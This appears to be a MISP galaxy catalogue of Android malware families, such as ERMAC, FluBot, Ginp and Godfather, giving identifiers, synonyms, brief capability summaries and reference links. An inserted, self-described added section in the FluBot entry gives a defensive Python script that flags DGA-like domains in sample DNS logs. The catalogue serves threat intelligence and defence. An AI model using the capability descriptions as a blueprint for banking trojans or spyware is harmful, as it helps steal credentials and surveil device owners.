- https://www.lookout.com/threat-intelligence/article/gamaredon-russian-android-surveillanceware - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DualToy (Android)
Internal MISP references
UUID 8269e779-db23-4c94-aafb-36ee94879417 which can be used as unique global reference for DualToy (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dvmap
Internal MISP references
UUID e5de818e-d25d-47a8-ab31-55fc992bf91b which can be used as unique global reference for Dvmap in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EagleMsgSpy
According to Lookout, EagleMsgSpy is a lawful intercept surveillance tool developed by a Chinese software development company with use by public security bureaus in mainland China. Early samples indicate the surveillance tool has been operational since at least 2017, with development continued into late 2024. EagleMsgSpy collects extensive data from the user: third-party chat messages, screen recording and screenshot capture, audio recordings, call logs, device contacts, SMS messages, location data, network activity. Through infrastructure overlap and artifacts from open command and control directories, Lookout attributes EagleMsgSpy to Wuhan Chinasoft Token Information Technology Co., Ltd. with high confidence.
Internal MISP references
UUID 1b53d17e-ab9c-4b9f-8c01-588bccac4dee which can be used as unique global reference for EagleMsgSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Elibomi
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Elibomi.
| Known Synonyms |
|---|
| Drinik |
Internal MISP references
UUID 63cc0b01-c92e-40e7-8669-48d10a490ffb which can be used as unique global reference for Elibomi in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.elibomi - webarchive
- https://blog.cyble.com/2021/09/07/fake-income-tax-application-targets-indian-taxpayers/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-android-malware-targets-taxpayers-in-india/ - webarchive
- https://www.trendmicro.com/en_vn/research/22/k/massive-phishing-campaigns-target-india-banks-clients.html#:~:text=We%20found%20five%20banking%20malware,card%20information%20via%20phishing%20campaigns.&text=We%20observed%20an%20uptick%20in,message%20with%20a%20phishing%20link. - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ERMAC
According to Intel471, ERMAC is an Android banking trojan that lets its operators detect when certain apps are launched and then overwrites the screen display with an overlay to steal the user's credentials.
Internal MISP references
UUID 602944f4-a86c-4a05-b98f-cfb525fb8896 which can be used as unique global reference for ERMAC in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac - webarchive
- https://blog.cyble.com/2022/05/25/ermac-back-in-action/ - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://research.nccgroup.com/2023/09/11/from-ermac-to-hook-investigating-the-technical-differences-between-two-android-malware-variants/ - webarchive
- https://hunt.io/blog/ermac-v3-banking-trojan-source-code-leak - webarchive
- https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html - webarchive
- https://twitter.com/ESETresearch/status/1445618031464357888 - webarchive
- https://twitter.com/ShilpeshTrivedi/status/1709096404835356883 - webarchive
- https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html - webarchive
- https://www.linkedin.com/posts/threatmon_rising-threat-ermac-variant-activity-7305193522180071426-J8c5 - webarchive
- https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ErrorFather
ErrorFather is an Android banking trojan with a multi-stage dropper. The final payload is derived from the Cerberus source code leak.
Internal MISP references
UUID 2c7f6a97-4469-4f97-9a69-5549282a94a6 which can be used as unique global reference for ErrorFather in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Eventbot
According to ThreatFabric, Eventbot overlays 15 financial targets from the UK, Italy, and Spain, and sniffs 234 apps of banks located in Europe as well as crypto wallets.
Internal MISP references
UUID 5a6fb8cd-d582-4c8c-b7e0-a5b4cf4f248f which can be used as unique global reference for Eventbot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ExoBot
Internal MISP references
UUID c9f2b058-6c22-462a-a20a-fca933a597dd which can be used as unique global reference for ExoBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot - webarchive
- https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/ - webarchive
- https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/ - webarchive
- https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html - webarchive
- https://blog.cyble.com/2022/03/24/coper-banking-trojan/ - webarchive
- https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Exodus
Internal MISP references
UUID 462bc006-b7bd-4e10-afdb-52baf86121e8 which can be used as unique global reference for Exodus in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus - webarchive
- https://securitywithoutborders.org/blog/2019/03/29/exodus.html - webarchive
- https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store - webarchive
- https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FaceStealer
Facebook Credential Stealer.
Internal MISP references
UUID c35ebd96-d2f8-4add-b86f-f552ed5dfa9b which can be used as unique global reference for FaceStealer in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.facestealer - webarchive
- https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html - webarchive
- https://labs.k7computing.com/index.php/facestealer-the-rise-of-facebook-credential-stealer-malware/ - webarchive
- https://threatpost.com/facestealer-trojan-google-play-facebook/179015/ - webarchive
- https://blogs.quickheal.com/stay-alert-of-facebook-credential-stealer-applications-stealing-users-credentials/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FakeAdBlocker
Internal MISP references
UUID d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6 which can be used as unique global reference for FakeAdBlocker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Fakecalls
According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.
Internal MISP references
UUID 014aeab6-2292-4ee5-83d6-fffb0fc21423 which can be used as unique global reference for Fakecalls in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FakeDefend
Internal MISP references
UUID 8ea1fc8c-ec66-4d39-b32a-da69d3277da4 which can be used as unique global reference for FakeDefend in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FakeSpy
Internal MISP references
UUID dd821edd-901b-4a5e-b35f-35bb811964ab which can be used as unique global reference for FakeSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy - webarchive
- https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/ - webarchive
- https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681 - webarchive
- https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FakeGram
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FakeGram.
| Known Synonyms |
|---|
| FakeTGram |
Internal MISP references
UUID 6c0fc7e4-4629-494f-b471-f7a8cc47c0e0 which can be used as unique global reference for FakeGram in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FastFire
Internal MISP references
UUID 5613da3a-06f5-4363-b468-0b8a03ffc292 which can be used as unique global reference for FastFire in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FastSpy
Internal MISP references
UUID a5e3e217-3790-4d7c-b67a-906b9ee69034 which can be used as unique global reference for FastSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FileCoder
According to Heimdal, FileCoder (detected by ESET as Android/Filecoder.C) is a ransomware strain for Android that targets devices running Android 5.1 and higher, and spreads via text messages containing a malicious link.
Internal MISP references
UUID 09ff3520-b643-44bd-a0de-90c0e75ba12f which can be used as unique global reference for FileCoder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FinFisher (Android)
Internal MISP references
UUID 0bf7acd4-6493-4126-9598-d2ed069e32eb which can be used as unique global reference for FinFisher (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher - webarchive
- https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/ - webarchive
- https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf - webarchive
- https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/ - webarchive
- https://securelist.com/finspy-unseen-findings/104322/ - webarchive
- https://github.com/linuzifer/FinSpy-Dokumentation - webarchive
- https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FlexiSpy (Android)
Internal MISP references
UUID 4305d59a-0d07-4021-a902-e7996378898b which can be used as unique global reference for FlexiSpy (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FlexNet
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlexNet.
| Known Synonyms |
|---|
| gugi |
Internal MISP references
UUID 80d7d229-b3a7-4205-8304-f7b18bda129f which can be used as unique global reference for FlexNet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FluBot
PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for its C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March 2021, the campaign has only intensified since.
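FluBot's DGA-based C&C is one reason the family outlived takedowns of individual domains: a bot that cannot reach one generated name simply moves on to the next. The following is an added example, not code from the page or from any of the cited reports: a lexical triage of DNS query logs that flags hosts which resolve several random-looking registrable labels. The scoring features and thresholds are generic DGA heuristics, not FluBot's actual algorithm, and the log format and sample lines are constructed for the example. The caveat is the one the description itself implies: when a FluBot sample resolves over DNS-over-HTTPS, a passive DNS log at the network edge sees no queries at all, so this logic must be fed from resolver or endpoint telemetry, or from a proxy that terminates DoH.

```python
"""Lexical DGA triage over DNS query logs (constructed sample data)."""
import math
import re
from collections import Counter

VOWELS = set("aeiou")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for empty input)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def registrable_label(qname: str) -> str:
    """Label left of the TLD, e.g. 'fraunhofer' for 'malpedia.caad.fkie.fraunhofer.de'.
    Assumption: no public-suffix list, so multi-part suffixes like co.uk are not handled."""
    labels = qname.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def dga_features(label: str) -> dict:
    """Cheap lexical features of one label."""
    vowels = sum(ch in VOWELS for ch in label)
    return {
        "length": len(label),
        "entropy": shannon_entropy(label),
        "vowel_ratio": vowels / len(label) if label else 0.0,
        "digits": sum(ch.isdigit() for ch in label),
        # longest stretch with no vowel at all (consonants, digits, hyphens)
        "longest_run": max((len(r) for r in re.split(r"[aeiou]", label)), default=0),
    }


def dga_score(label: str) -> int:
    """0..4: one point per feature that looks machine-generated."""
    f = dga_features(label)
    return sum([
        f["entropy"] > 3.2,
        f["vowel_ratio"] < 0.2,
        f["digits"] >= 2,
        f["longest_run"] >= 5,
    ])


# Constructed log lines: "<timestamp> <client> <qtype> <qname>".
SAMPLE_LOG = [
    "2021-05-03T10:12:01Z 10.0.0.5 A kjhq8d7f2hf9aq.com",
    "2021-05-03T10:12:02Z 10.0.0.5 A xprtmvdk3wz7lq.com",
    "2021-05-03T10:12:02Z 10.0.0.5 A zqhdfr5npkv0tsm.com",
    "2021-05-03T10:12:03Z 10.0.0.5 A www.google.com",
    "2021-05-03T10:12:04Z 10.0.0.7 A www.google.com",
    "2021-05-03T10:12:05Z 10.0.0.7 A cdn.bitdefender.com",
    "2021-05-03T10:12:06Z 10.0.0.7 A malpedia.caad.fkie.fraunhofer.de",
    "2021-05-03T10:12:07Z 10.0.0.7 A xprtmvdk3wz7lq.com",  # one hit: below min_hits
    "malformed line",
]


def triage(log_lines, min_hits: int = 3, threshold: int = 3) -> dict:
    """Clients that queried at least min_hits distinct DGA-looking domains.
    Returns {client: sorted list of flagged qnames}."""
    hits = {}
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # skip lines that do not match the constructed format
        _ts, src, _qtype, qname = parts[:4]
        qname = qname.rstrip(".").lower()
        if dga_score(registrable_label(qname)) >= threshold:
            hits.setdefault(src, set()).add(qname)
    return {src: sorted(names) for src, names in hits.items() if len(names) >= min_hits}


if __name__ == "__main__":
    for src, names in triage(SAMPLE_LOG).items():
        print(src, "queried", len(names), "DGA-looking domains:", ", ".join(names))
```

The per-client threshold, not the per-name score, is what separates a DGA client from a user who once visited an odd hostname: a bot walking its generated list produces a burst of high-scoring names from one source, most of them returning NXDOMAIN, which is a second signal worth joining in if the resolver logs response codes.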
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FluBot.
| Known Synonyms |
|---|
| Cabassous |
| FakeChat |
Internal MISP references
UUID ef91833f-3334-4955-9218-f106494e9fc0 which can be used as unique global reference for FluBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot - webarchive
- https://www.infinitumit.com.tr/flubot-zararlisi/ - webarchive
- https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9 - webarchive
- https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html - webarchive
- https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/ - webarchive
- https://twitter.com/alberto__segura/status/1399249798063087621?s=20 - webarchive
- https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html - webarchive
- https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/ - webarchive
- https://twitter.com/alberto__segura/status/1404098461440659459 - webarchive
- https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered - webarchive
- https://securityintelligence.com/posts/story-of-fakechat-malware/ - webarchive
- https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/ - webarchive
- https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/ - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones - webarchive
- https://www.prodaft.com/m/reports/FluBot_4.pdf - webarchive
- https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-january-to-june-2025/ - webarchive
- https://blog.zimperium.com/flubot-vs-zimperium/ - webarchive
- https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/ - webarchive
- https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368 - webarchive
- https://twitter.com/alberto__segura/status/1384840011892285440 - webarchive
- https://twitter.com/alberto__segura/status/1402615237296148483 - webarchive
- https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/ - webarchive
- https://twitter.com/malwrhunterteam/status/1359939300238983172 - webarchive
- https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027 - webarchive
- https://twitter.com/alberto__segura/status/1395675479194095618 - webarchive
- https://therecord.media/flubot-malware-gang-arrested-in-barcelona/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain - webarchive
- https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html - webarchive
- https://hispasec.com/resources/FedexBanker.pdf - webarchive
- https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html - webarchive
- https://www.ncsc.admin.ch/22w12-de - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jul-Dec%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf - webarchive
- https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/ - webarchive
- https://mobile.twitter.com/alberto__segura/status/1400396365759500289 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FluHorse
According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.
Internal MISP references
UUID aeaeb8b2-650e-471d-a901-3c4fbae42854 which can be used as unique global reference for FluHorse in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse - webarchive
- https://www.fortinet.com/blog/threat-research/fortinet-reverses-flutter-based-android-malware-fluhorse - webarchive
- https://cryptax.medium.com/inside-kangapack-the-kangaroo-packer-with-native-decryption-3e7e054679c4 - webarchive
- https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FlyTrap
Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading.
Internal MISP references
UUID 24af5bcc-d4bd-42dd-aed4-f994b30b4921 which can be used as unique global reference for FlyTrap in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FunkyBot
Internal MISP references
UUID bc0d37fa-113a-45ba-8a1c-b9d818e31f27 which can be used as unique global reference for FunkyBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot - webarchive
- https://securelist.com/roaming-mantis-part-v/96250/ - webarchive
- https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html - webarchive
- https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FurBall
According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.
Internal MISP references
UUID 53282cc8-fefc-47d7-b6a5-a82a05a88f2a which can be used as unique global reference for FurBall in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball - webarchive
- https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html - webarchive
- https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ - webarchive
- https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/ - webarchive
- https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program - webarchive
- https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/ - webarchive
- https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gaganode (Android)
According to Synthient, Gaganode is a decentralized bandwidth monetization service that enables both users and publishers to earn crypto for their bandwidth or monetize other people's bandwidth. The SDK intentionally implements RCE, thus aligning Gaganode more closely with malware than standard commercial SDKs.
Internal MISP references
UUID 1034e0e2-0643-40e3-b25e-32f541e9d3c1 which can be used as unique global reference for Gaganode (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Geost
Internal MISP references
UUID b9639878-733c-4f30-9a13-4680a7e17415 which can be used as unique global reference for Geost in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost - webarchive
- https://www.trendmicro.com/en_us/research/20/c/dissecting-geost-exposing-the-anatomy-of-the-android-trojan-targeting-russian-banks.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/ - webarchive
- https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ghimob
Internal MISP references
UUID 3d1f2591-05fe-42f4-aaf8-ed1428f17605 which can be used as unique global reference for Ghimob in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GhostCtrl
Internal MISP references
UUID 3b6c1771-6d20-4177-8be0-12116e254bf5 which can be used as unique global reference for GhostCtrl in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gigabud
Gigabud is an Android Remote Access Trojan (RAT) that can record the victim's screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping, and other applications. Threat actors have been observed using deceptive websites to distribute Gigabud RAT.
Internal MISP references
UUID 8f188382-7a31-46a5-83c6-5991dfe739ee which can be used as unique global reference for Gigabud in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ginp
Ginp is a mobile banking trojan targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit card numbers by implementing overlay attacks; overlay targets include, for example, the default SMS application. What makes Ginp a remarkable family is how its operators managed to keep it undetected over time while it received version upgrades over many years. According to ThreatFabric, Ginp has the following features:
- Overlaying: Dynamic (local overlays obtained from the C2)
- SMS harvesting: SMS listing
- SMS harvesting: SMS forwarding
- Contact list collection
- Application listing
- Overlaying: Targets list update
- SMS: Sending
- Calls: Call forwarding
- C2 Resilience: Auxiliary C2 list
- Self-protection: Hiding the App icon
- Self-protection: Preventing removal
- Self-protection: Emulation-detection
Internal MISP references
UUID 77e9ace0-f6e5-4d6e-965a-a653ff626be1 which can be used as unique global reference for Ginp in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp - webarchive
- https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/ - webarchive
- https://twitter.com/ESETresearch/status/1269945115738542080 - webarchive
- https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/ - webarchive
- https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://muha2xmad.github.io/malware-analysis/ginp/ - webarchive
- https://www.youtube.com/watch?v=WeL_xSryj8E - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GlanceLove
Internal MISP references
UUID 24a709ef-c2e4-45ca-90b6-dfa184472f49 which can be used as unique global reference for GlanceLove in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove - webarchive
- https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773 - webarchive
- https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/ - webarchive
- https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/ - webarchive
- https://www.clearskysec.com/glancelove/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GnatSpy
Internal MISP references
UUID a3b6a355-3afe-49ae-9f87-679c6c382943 which can be used as unique global reference for GnatSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GoatRAT
Internal MISP references
UUID f699d295-1072-418b-8aa2-cb36fbd4c6c7 which can be used as unique global reference for GoatRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Godfather
According to PCrisk, Godfather is an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications, and threat actors use it to steal account credentials. Additionally, Godfather can steal SMS messages, device information, and other data.
Internal MISP references
UUID 8e95a9d5-08fb-4f11-b70a-622148bd1e62 which can be used as unique global reference for Godfather in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather - webarchive
- https://shindan.io/blog/godfather-part-1-a-multistage-dropper - webarchive
- https://muha2xmad.github.io/malware-analysis/godfather/ - webarchive
- https://github.com/LaurieWired/StrangeLoop - webarchive
- https://brandefense.io/blog/godfather-android-banking-trojan/ - webarchive
- https://blog.group-ib.com/godfather-trojan - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GoldenEagle
Internal MISP references
UUID b7c0c11d-8471-4b10-bbf2-f9c0f30bc27e which can be used as unique global reference for GoldenEagle in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GoldenRAT
Internal MISP references
UUID e111fff8-c73c-4069-b804-2d3732653481 which can be used as unique global reference for GoldenRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GoldDigger
Internal MISP references
UUID 8ff9cde1-627e-4967-8b12-195544f31d83 which can be used as unique global reference for GoldDigger in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
goontact
Internal MISP references
UUID 008ef3f3-579e-4065-ad0a-cf96be00becf which can be used as unique global reference for goontact in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact - webarchive
- https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/ - webarchive
- https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GPlayed
Cisco Talos identifies GPlayed as malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its ability to adapt after deployment: the operator can remotely load plugins, inject scripts, and even compile new .NET code for execution on the device.
Internal MISP references
UUID 13dc1ec7-aba7-4553-b990-8323405a1d32 which can be used as unique global reference for GPlayed in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gravity RAT (Android)
Internal MISP references
UUID fed09d31-6378-4e85-b644-5500491dff88 which can be used as unique global reference for Gravity RAT (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.gravity_rat - webarchive
